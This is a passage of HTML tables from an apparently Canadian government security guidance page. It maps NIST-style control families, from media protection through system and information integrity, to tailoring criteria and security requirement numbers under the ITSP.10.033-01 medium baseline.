id="tab10"><caption>Table 10: Media protection (MP)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>MP-01</td> <td>Media protection policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>MP-02</td> <td>Media access</td> <td>C</td> <td><a href="#03-08-02">Media access 03.08.02</a></td> </tr><tr><td>MP-03</td> <td>Media marking</td> <td>C</td> <td><a href="#03-08-04">Media marking 03.08.04</a></td> </tr><tr><td>MP-04</td> <td>Media storage</td> <td>C</td> <td><a href="#03-08-01">Media storage 03.08.01</a></td> </tr><tr><td>MP-05</td> <td>Media transport</td> <td>C</td> <td><a href="#03-08-05">Media transport 03.08.05</a></td> </tr><tr><td>MP-06</td> <td>Media sanitization</td> <td>C</td> <td><a href="#03-08-03">Media sanitization 03.08.03</a></td> </tr><tr><td>MP-06(03)</td> <td>Media sanitization: Non-destructive techniques</td> <td>ORC</td> <td>none</td> </tr><tr><td>MP-06(08)</td> <td>Media sanitization: Remote purging or wiping of information</td> <td>ORC</td> <td>none</td> </tr><tr><td>MP-07</td> <td>Media use</td> <td>C</td> <td><a href="#03-08-07">Media use 03.08.07</a></td> </tr><tr><td>MP-08</td> <td>Media downgrading</td> <td>ORC</td> <td>none</td> </tr><tr><td>MP-08(03)</td> <td>Media downgrading: Protected information</td> <td>ORC</td> <td>none</td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab11"><caption>Table 11: Physical and environmental protection (PE)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>PE-01</td> <td>Physical and environmental protection policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>PE-02</td> <td>Physical access authorizations</td> <td>C</td> <td><a href="#03-10-01">Physical access authorizations 03.10.01</a></td> </tr><tr><td>PE-02(400)</td> <td>Physical access authorizations: Identification cards requirements</td> <td>GC</td> <td>none</td> </tr><tr><td>PE-03</td> <td>Physical access control</td> <td>C</td> <td><a href="#03-10-07">Physical access control 03.10.07</a></td> </tr><tr><td>PE-03(400)</td> <td>Physical access control: Security inspections</td> <td>GC</td> <td>none</td> </tr><tr><td>PE-04</td> <td>Access control for transmission</td> <td>C</td> <td><a href="#03-10-08">Access control for transmission 03.10.08</a></td> </tr><tr><td>PE-05</td> <td>Access control for output devices</td> <td>C</td> <td><a href="#03-10-07">Physical access control 03.10.07</a></td> </tr><tr><td>PE-06</td> <td>Monitoring physical access</td> <td>C</td> <td><a href="#03-10-02">Monitoring physical access 03.10.02</a></td> </tr><tr><td>PE-06(01)</td> <td>Monitoring physical access: Intrusion alarms and surveillance equipment</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-08</td> <td>Visitor access records</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-09</td> <td>Power equipment and cabling</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-10</td> <td>Emergency shutoff</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-11</td> <td>Emergency power</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-12</td> <td>Emergency lighting</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-13</td> <td>Fire protection</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-13(01)</td> <td>Fire protection: Detection systems – automatic activation and notification</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-13(04)</td> <td>Fire protection: Inspections</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-13(400)</td> <td>Fire protection: Emergency services</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-14</td> <td>Environmental controls</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-15</td> <td>Water damage protection</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-16</td> <td>Delivery and removal</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-17</td> <td>Alternate work site</td> <td>C</td> <td><a href="#03-10-06">Alternate work site 03.10.06</a></td> </tr><tr><td>PE-400</td> <td>Remote and telework environments</td> <td>GC</td> <td>none</td> </tr><tr><td>PE-400(01)</td> <td>Remote and telework environments: Physical information and assets storage</td> <td>GC</td> <td>none</td> </tr><tr><td>PE-400(02)</td> <td>Remote and telework environments: International remote/telework</td> <td>GC</td> <td>none</td> </tr><tr><td>PE-401</td> <td>Security operations centre</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab12"><caption>Table 12: Planning (PL)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>PL-01</td> <td>Planning policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>PL-02</td> <td>System security and privacy plans</td> <td>C</td> <td><a href="#03-15-02">System security plan 03.15.02</a></td> </tr><tr><td>PL-04</td> <td>Rules of behaviour</td> <td>C</td> <td><a href="#03-15-03">Rules of behaviour 03.15.03</a></td> </tr><tr><td>PL-04(01)</td> <td>Rules of behaviour: Social media and external site/application usage restrictions</td> <td>NCO</td> <td>none</td> </tr><tr><td>PL-08</td> <td>Security and privacy architectures</td> <td>NCO</td> <td>none</td> </tr><tr><td>PL-10</td> <td>Baseline selection</td> <td>GC</td> <td>none</td> </tr><tr><td>PL-11</td> <td>Baseline tailoring</td> <td>GC</td> <td>none</td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab13"><caption>Table 13: Program management (PM)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>PM-01</td> <td>Information security program plan</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-02</td> <td>Information security program leadership role</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-03</td> <td>Information security and privacy resources</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-04</td> <td>Plan of action and milestones process</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-05</td> <td>System and program inventory</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-05(01)</td> <td>System inventory: Inventory of personal information</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-06</td> <td>Measures of performance</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-07</td> <td>Enterprise architecture</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-07(01)</td> <td>Enterprise architecture: Offloading</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-08</td> <td>Critical infrastructure plan</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-09</td> <td>Risk management strategy</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-10</td> <td>Authorization process</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-11</td> <td>Mission and business process definition</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-12</td> <td>Insider threat program</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-13</td> <td>Security and privacy workforce</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-14</td> <td>Testing, training, and monitoring</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-15</td> <td>Security and privacy groups and associations</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-16</td> <td>Threat awareness program</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-16(01)</td> <td>Threat awareness program: Automated means for sharing threat intelligence</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-17</td> <td>Protecting specified information on outsourced external systems</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-18</td> <td>Privacy program plan</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-19</td> <td>Privacy program leadership role</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-20</td> <td>Communication of key privacy services</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-20(01)</td> <td>Communication of key privacy services: Privacy policies on websites, applications, and digital services</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-21</td> <td>Maintain a record of disclosures</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-22</td> <td>Personal information quality management</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-23</td> <td>Data governance committee</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-24</td> <td>Data integrity board</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-25</td> <td>Minimization of personal information used in testing, training, and research</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-26</td> <td>Complaint management</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-27</td> <td>Privacy reporting</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-28</td> <td>Risk framing</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-29</td> <td>Risk management program leadership roles</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-30</td> <td>Supply chain risk management strategy</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-30(01)</td> <td>Supply chain risk management strategy: Suppliers of critical or mission-essential items</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-31</td> <td>Continuous monitoring strategy</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-32</td> <td>Purposing</td> <td>N/A</td> <td>none</td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab14"><caption>Table 14: Personnel security (PS)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>PS-01</td> <td>Personnel security policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>PS-02</td> <td>Position security analysis</td> <td>GC</td> <td>none</td> </tr><tr><td>PS-03</td> <td>Personnel screening</td> <td>C</td> <td><a href="#03-09-01">Personnel screening 03.09.01</a></td> </tr><tr><td>PS-04</td> <td>Personnel termination</td> <td>C</td> <td><a href="#03-09-02">Personnel termination and transfer 03.09.02</a></td> </tr><tr><td>PS-05</td> <td>Personnel transfer</td> <td>C</td> <td><a href="#03-09-02">Personnel termination and transfer 03.09.02</a></td> </tr><tr><td>PS-06</td> <td>Access agreements</td> <td>NCO</td> <td>none</td> </tr><tr><td>PS-07</td> <td>External personnel security</td> <td>NCO</td> <td>none</td> </tr><tr><td>PS-08</td> <td>Personnel sanctions</td> <td>NCO</td> <td>none</td> </tr><tr><td>PS-09</td> <td>Position descriptions</td> <td>GC</td> <td>none</td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab15"><caption>Table 15: Personal information handling and transparency (PT)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>PT-01</td> <td>Personal information handling and transparency policy and procedures</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-02</td> <td>Authority to collect and use personal information</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-02(01)</td> <td>Authority to collect and use personal information: Data tagging</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-02(02)</td> <td>Authority to collect and use personal information: Automation</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-03</td> <td>Personal information handling uses and disclosures</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-03(01)</td> <td>Personal information handling uses and disclosures: Data tagging</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-03(02)</td> <td>Personal information handling uses and disclosures: Automation</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-04</td> <td>Consent</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-04(01)</td> <td>Consent: Tailored consent Government of Canada</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-04(02)</td> <td>Consent: Timely consent</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-04(03)</td> <td>Consent: Revocation</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-04(400)</td> <td>Consent: Tailored consent privatesector</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-05</td> <td>Privacy notice</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-05(01)</td> <td>Privacy notice: Timely privacy notice statements</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-05(02)</td> <td>Privacy notice: Privacy notice statements</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-06</td> <td>Personal information banks</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-06(01)</td> <td>Personal information banks: Consistent uses and disclosures</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-06(02)</td> <td>Personal information banks: Exempt banks</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-07</td> <td>Particularly sensitive personal information</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-07(01)</td> <td>Particularly sensitive personal information: Social insurance numbers</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-07(02)</td> <td>Particularly sensitive personal information: <em>Canadian Charter of Rights and Freedoms</em></td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-07(400)</td> <td>Particularly sensitive personal information: Private sector</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-08</td> <td>Data matching requirements</td> <td>N/A</td> <td>none</td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab16"><caption>Table 16: Risk assessment (RA)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>RA-01</td> <td>Risk assessment policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>RA-02</td> <td>Security categorization</td> <td>GC</td> <td>none</td> </tr><tr><td>RA-03</td> <td>Risk assessment</td> <td>C</td> <td><a href="#03-11-01">Risk assessment 03.11.01</a></td> </tr><tr><td>RA-03(01)</td> <td>Risk assessment: Supply chain risk assessment</td> <td>C</td> <td><a href="#03-11-01">Risk assessment 03.11.01</a></td> </tr><tr><td>RA-05</td> <td>Vulnerability monitoring and scanning</td> <td>C</td> <td><a href="#03-11-02">Vulnerability monitoring and scanning 03.11.02</a></td> </tr><tr><td>RA-05(02)</td> <td>Vulnerability monitoring and scanning: Update vulnerabilities to be scanned</td> <td>C</td> <td><a href="#03-11-02">Vulnerability monitoring and scanning 03.11.02</a></td> </tr><tr><td>RA-05(05)</td> <td>Vulnerability monitoring and scanning: Privileged access</td> <td>ORC</td> <td>none</td> </tr><tr><td>RA-05(11)</td> <td>Vulnerability monitoring and scanning: Public disclosure program</td> <td>NCO</td> <td>none</td> </tr><tr><td>RA-07</td> <td>Risk response</td> <td>C</td> <td><a href="#03-11-04">Risk response 03.11.04</a></td> </tr><tr><td>RA-09</td> <td>Criticality analysis</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab17"><caption>Table 17: System and services acquisition (SA)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>SA-01</td> <td>System and services acquisition policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>SA-02</td> <td>Allocation of resources</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-03</td> <td>System development life cycle</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-04</td> <td>Acquisition process</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-04(01)</td> <td>Acquisition process: Functional properties of controls</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-04(09)</td> <td>Acquisition process: Functions, ports, protocols, and services in use</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-04(10)</td> <td>Acquisition process: Use of approved digital credential products</td> <td>GC</td> <td>none</td> </tr><tr><td>SA-04(12)</td> <td>Acquisition process: Data ownership</td> <td>GC</td> <td>none</td> </tr><tr><td>SA-05</td> <td>System documentation</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-08</td> <td>Security and privacy engineering principles</td> <td>C</td> <td><a href="#03-16-01">Security engineering principles 03.16.01</a></td> </tr><tr><td>SA-09</td> <td>External system services</td> <td>C</td> <td><a href="#03-16-03">External system services 03.16.03</a></td> </tr><tr><td>SA-09(01)</td> <td>External system services: Risk assessments and organizational approvals</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-09(02)</td> <td>External System Services: Identification of functions, ports,protocols, and services</td> <td>ORC</td> <td>none</td> </tr><tr><td>SA-10</td> <td>Developer configuration management</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-10(01)</td> <td>Developer configuration management: Software and firmware integrity verification</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-11</td> <td>Developer testing and evaluation</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-15</td> <td>Development process, standards, and tools</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-15(03)</td> <td>Development process, standards, and tools: Criticality Analysis</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-16</td> <td>Developer provided training</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-17</td> <td>Developer security and privacy architecture and design</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-22</td> <td>Unsupported system components</td> <td>C</td> <td><a href="#03-16-02">Unsupported system components 03.16.02</a></td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab18"><caption>Table 18: System and communications protection (SC)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>SC-01</td> <td>System and communications protection policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>SC-02</td> <td>Separation of system and user functionality</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-04</td> <td>Information in shared system resources</td> <td>C</td> <td><a href="#03-13-04">Information in shared system resources 03.13.04</a></td> </tr><tr><td>SC-05</td> <td>Denial-of-service protection</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-05(02)</td> <td>Denial-of-service protection: Capacity, bandwidth, and redundancy</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-05(03)</td> <td>Denial-of-service protection: Detection and monitoring</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-07</td> <td>Boundary protection</td> <td>C</td> <td><a href="#03-13-01">Boundary protection 03.13.01</a></td> </tr><tr><td>SC-07(03)</td> <td>Boundary protection: Access points</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-07(04)</td> <td>Boundary protection: External telecommunications services</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-07(05)</td> <td>Boundary protection: Deny by default – allow by exception</td> <td>C</td> <td><a href="#03-13-06">Network communications – deny by default – allow by exception 03.13.06</a></td> </tr><tr><td>SC-07(07)</td> <td>Boundary protection: Split tunneling for remote devices</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-07(08)</td> <td>Boundary protection: Route traffic to authenticated proxy servers</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-07(09)</td> <td>Boundary protection: Restrict threatening outgoing communications traffic</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-07(11)</td> <td>Boundary protection: Incoming communications traffic</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-07(12)</td> <td>Boundary protection: Host-based protection</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-07(13)</td> <td>Boundary protection: Isolation of security tools, mechanisms, and support components</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-08</td> <td>Transmission confidentiality and integrity</td> <td>C</td> <td><a href="#03-13-08">Transmission and storage confidentiality 03.13.08</a></td> </tr><tr><td>SC-08(01)</td> <td>Transmission confidentiality and integrity: Cryptographic protection</td> <td>C</td> <td><a href="#03-13-08">Transmission and storage confidentiality 03.13.08</a></td> </tr><tr><td>SC-10</td> <td>Network disconnect</td> <td>C</td> <td><a href="#03-13-09">Network disconnect 03.13.09</a></td> </tr><tr><td>SC-12</td> <td>Cryptographic key establishment and management</td> <td>C</td> <td><a href="#03-13-10">Cryptographic key establishment and management 03.13.10</a></td> </tr><tr><td>SC-12(01)</td> <td>Cryptographic key establishment and management: Availability</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-13</td> <td>Cryptographic protection</td> <td>C</td> <td><a href="#03-13-11">Cryptographic protection 03.13.11</a></td> </tr><tr><td>SC-15</td> <td>Collaborative computing devices and applications</td> <td>C</td> <td><a href="#03-13-12">Collaborative computing devices and applications 03.13.12</a></td> </tr><tr><td>SC-15(03)</td> <td>Collaborative computing devices and applications: Disabling and removal in secure work areas</td> <td>GC</td> <td>none</td> </tr><tr><td>SC-17</td> <td>Public key infrastructure certificates</td> <td>GC</td> <td>none</td> </tr><tr><td>SC-18</td> <td>Mobile code</td> <td>C</td> <td><a href="#03-13-13">Mobile code 03.13.13</a></td> </tr><tr><td>SC-18(01)</td> <td>Mobile code: Identify unacceptable code and take corrective actions</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-18(02)</td> <td>Mobile code: Acquisition, development, and use</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-18(03)</td> <td>Mobile code: Prevent downloading and execution</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-18(04)</td> <td>Mobile code: Prevent automatic execution</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-18(05)</td> <td>Mobile code: Allow execution only in confined environments</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-20</td> <td>Secure name/address resolution service (authoritative source)</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-21</td> <td>Secure name/address resolution service (recursive or caching resolver)</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-22</td> <td>Architecture and provisioning for name/address resolution service</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-23</td> <td>Session authenticity</td> <td>C</td> <td><a href="#03-13-15">Session authenticity 03.13.15</a></td> </tr><tr><td>SC-23(01)</td> <td>Session authenticity: Invalidate session identifiers at logout</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-23(03)</td> <td>Session authenticity: Unique system-generated session identifiers</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-28</td> <td>Protection of information at rest</td> <td>C</td> <td><a href="#03-13-08">Transmission and storage confidentiality 03.13.08</a></td> </tr><tr><td>SC-28(01)</td> <td>Protection of information at rest: Cryptographic protection</td> <td>C</td> <td><a href="#03-13-08">Transmission and storage confidentiality 03.13.08</a></td> </tr><tr><td>SC-29</td> <td>Heterogeneity</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-39</td> <td>Process isolation</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab19"><caption>Table 19: System and information integrity (SI)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>SI-01</td> <td>System and information integrity policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>SI-02</td> <td>Flaw remediation</td> <td>C</td> <td><a href="#03-14-01">Flaw remediation 03.14.01</a></td> </tr><tr><td>SI-02(02)</td> <td>Flaw remediation: Automated flaw remediation status</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-02(06)</td> <td>Flaw remediation: Removal of previous versions of software and firmware</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-03</td> <td>Malicious code protection</td> <td>C</td> <td><a href="#03-14-02">Malicious code protection 03.14.02</a></td> </tr><tr><td>SI-03(04)</td> <td>Malicious code protection: Updates only by privileged users</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04</td> <td>System monitoring</td> <td>C</td> <td><a href="#03-14-06">System monitoring 03.14.06</a></td> </tr><tr><td>SI-04(02)</td> <td>System monitoring: Automated tools and mechanisms for real-time analysis</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04(04)</td> <td>System monitoring: Inbound and outbound communications traffic</td> <td>C</td> <td><a href="#03-14-06">System monitoring 03.14.06</a></td> </tr><tr><td>SI-04(05)</td> <td>System monitoring: System-generated alerts</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04(10)</td> <td>System monitoring: Visibility of encrypted communications</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04(11)</td> <td>System monitoring: Analyze communications traffic anomalies</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04(12)</td> <td>System monitoring: Automated organization-generated alerts</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04(13)</td> <td>System monitoring: Analyze traffic and event patterns</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04(14)</td> <td>System monitoring: Wireless intrusion detection</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04(15)</td> <td>System monitoring: Wireless to wireline communications</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-05</td> <td>Security alerts, advisories, and directives</td> <td>C</td> <td><a href="#03-14-03">Security alerts, advisories, and directives 03.14.03</a></td> </tr><tr><td>SI-07</td> <td>Software, firmware, and information integrity</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-07(01)</td> <td>Software, firmware, and information integrity: Integrity checks</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-07(02)</td> <td>Software, firmware, and information integrity: Automated notifications of integrity violations</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-07(03)</td> <td>Software, firmware, and information integrity: Centrally-managed integrity tools</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-07(07)</td> <td>Software, firmware, and information integrity: Integration of detection and response</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-08</td> <td>Spam protection</td> <td>ORC</td> <td>none</td> </tr><tr><td>SI-08(02)</td> <td>Spam protection: Automatic updates</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-10</td> <td>Information input validation</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-11</td> <td>Error handling</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-12</td> <td>Information management and retention </td> <td>C</td> <td><a 